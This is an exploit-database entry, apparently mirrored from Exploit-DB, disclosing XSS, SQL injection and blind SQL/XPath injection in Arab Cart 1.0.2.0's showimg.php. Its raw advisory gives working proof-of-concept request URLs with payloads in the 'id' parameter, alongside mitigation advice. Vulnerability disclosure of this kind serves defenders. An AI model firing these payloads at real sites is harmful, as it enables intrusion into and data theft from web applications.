header-logo
Suggest Exploit
vendor:
Arab Cart
by:
indoushka
7,5
CVSS
HIGH
XSS, SQL Injection, Blind SQL/XPath Injection
79, 89, 643
CWE
Product Name: Arab Cart
Affected Version From: 1.0.2.0
Affected Version To: 1.0.2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2010

Arab Cart Version 1.0.2.0 Mullti Vulnerability

The vulnerability exists due to insufficient validation of user-supplied input in 'id' parameter of 'showimg.php' script. A remote attacker can execute arbitrary HTML and script code in browser in context of the vulnerable website. Also, an attacker can inject arbitrary SQL commands to the application. Additionally, an attacker can inject arbitrary XPath commands to the application.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. Also, it is recommended to use prepared statements when interacting with the database.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Arab Cart Version 1.0.2.0 Mullti Vulnerability            
| # Author   : indoushka                                                               
| # email    : indoushka@dgsn.dz                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                              |
| # Script   : Copyright ArabCART © .2010     
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Mullti    
|                                                                  
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- XSS
 
http://server/arabCart/showimg.php?id=<img+src=http://server/acrobat.gif+onload=alert(213771818860)>&sid=8207c6aca4d21740c20f51527ccb3f7a
 
 2- SQL injection
 
 http://server/arabCart/showimg.php?id=%00'
 
 3- Blind SQL/XPath injection
 
 http://server/arabCart/showimg.php?id=8+and+31337-31337=0+--+ 

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net 
www.alkrsan.net * www.kadmiwe.net * www.arhack.net   
--------------------------------------------------------------------------------------------------------------